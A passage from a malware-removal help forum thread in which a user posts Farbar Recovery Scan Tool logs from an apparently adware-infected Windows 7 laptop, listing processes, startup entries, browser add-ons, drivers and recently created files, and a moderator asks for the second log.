    2016-09-18 20:43 - 2009-07-14 00:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
    2016-09-18 20:43 - 2009-07-14 00:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
    2016-09-18 20:43 - 2009-07-14 00:49 - 00001266 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
    2016-09-18 20:40 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\ModemLogs
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================
     
  17. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    I still need the second log.
     
  18. photiost

    photiost Established Techie7 Member

    If you mean the second log from the Farbar, no `addition.txt` was created on this last run ...
     
  19. photiost

    photiost Established Techie7 Member

    Let me run that again ... with the addition checked ...
     
  20. photiost

    photiost Established Techie7 Member

    OK, here is a fresh copy of both logs:

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-09-2016
    Ran by Administrator (administrator) on DELL35X8BT1 (19-09-2016 21:56:05)
    Running from C:\Users\Administrator\Downloads
    Loaded Profiles: Administrator (Available Profiles: Administrator)
    Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
    (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    (O2Micro International) C:\Windows\System32\drivers\o2flash.exe
    (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
    (Intel Corporation) C:\Windows\System32\igfxtray.exe
    (Intel Corporation) C:\Windows\System32\hkcmd.exe
    (Intel Corporation) C:\Windows\System32\igfxpers.exe
    (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (Global surveys) C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
    (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [626552 2012-06-18] (Alps Electric Co., Ltd.)
    HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [525312 2011-02-15] (IDT, Inc.)
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-09-12] (SUPERAntiSpyware)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\Run: [Interstatnogui] => C:\Users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe [4110848 2016-09-18] (Global surveys)
    ShellIconOverlayIdentifiers: [KzShlobj2] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F3} => C:\Program Files (x86)\KuaiZip\X64\KZipShell.dll [2016-09-18] ()
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}: [DhcpNameServer] 192.168.0.1 24.200.241.37 24.202.72.13
    Tcpip\..\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}: [DhcpNameServer] 10.254.240.200 10.254.240.201

    Internet Explorer:
    ==================
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.cloudynights.com/page/index.html
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO: Icatti -> {7B6678FD-F9E3-46FD-aCF0-4C011573F737} -> C:\Program Files\Icatti\Orosbusf64.dll => No File
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-09-05] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
    BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-09-05] (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default
    FF DefaultSearchEngine: Search Module
    FF SelectedSearchEngine: Search Module
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-19]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-09-18] ()
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> no filepath.

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 03:11 - 2016-09-19 03:11 - 00036789 _____ C:\ComboFix.txt
    2016-09-19 03:08 - 2016-09-19 03:08 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 22:20 - 2016-09-19 03:12 - 00000000 ____D C:\ComboFix
    2016-09-18 22:20 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Desktop\ComboFix.exe
    2016-09-18 21:39 - 2016-09-19 03:11 - 00000000 ____D C:\Qoobox
    2016-09-18 21:39 - 2011-06-26 02:45 - 00256000 _____ C:\WINDOWS\PEV.exe
    2016-09-18 21:39 - 2010-11-07 13:20 - 00208896 _____ C:\WINDOWS\MBR.exe
    2016-09-18 21:39 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00098816 _____ C:\WINDOWS\sed.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00080412 _____ C:\WINDOWS\grep.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00068096 _____ C:\WINDOWS\zip.exe
    2016-09-18 21:38 - 2016-09-19 03:10 - 00000000 ____D C:\WINDOWS\erdnt
    2016-09-18 21:38 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Downloads\ComboFix.exe
    2016-09-18 21:09 - 2016-09-18 21:09 - 00006874 _____ C:\Users\Administrator\Desktop\JRT.txt
    2016-09-18 21:07 - 2016-09-18 21:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 20:56 - 2016-09-18 21:02 - 00000000 ____D C:\AdwCleaner
    2016-09-18 20:51 - 2016-09-18 20:51 - 00165985 _____ C:\malware scan log1.txt
    2016-09-18 20:38 - 2016-09-18 20:38 - 00006960 _____ C:\mwbits.txt
    2016-09-18 20:15 - 2016-09-18 20:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashDumps
    2016-09-18 20:09 - 2016-09-19 20:55 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-09-18 20:09 - 2016-09-18 21:00 - 00000000 ____D C:\Program Files (x86)\KuaiZip
    2016-09-18 20:09 - 2016-09-18 20:43 - 00001102 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-09-18 20:05 - 2016-09-18 20:05 - 00144744 _____ C:\Users\Administrator\Documents\RKreport E446.tmp.txt
    2016-09-18 19:22 - 2016-09-18 19:22 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
    2016-09-18 19:21 - 2016-09-18 20:43 - 00000902 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\Program Files\RogueKiller
    2016-09-18 19:02 - 2016-09-18 19:03 - 01610560 _____ (Malwarebytes) C:\Users\Administrator\Downloads\JRT.exe
    2016-09-18 19:02 - 2016-09-18 19:02 - 03861056 _____ C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    2016-09-18 19:01 - 2016-09-18 19:02 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
    2016-09-18 18:59 - 2016-09-18 19:00 - 33565440 _____ (Adlice Software ) C:\Users\Administrator\Downloads\setup.exe
    2016-09-18 11:58 - 2016-09-19 21:48 - 00020345 _____ C:\Users\Administrator\Downloads\Addition.txt
    2016-09-18 11:57 - 2016-09-19 21:56 - 00011448 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-19 21:56 - 00000000 ____D C:\FRST
    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001153 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001147 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-19 21:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ___RD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
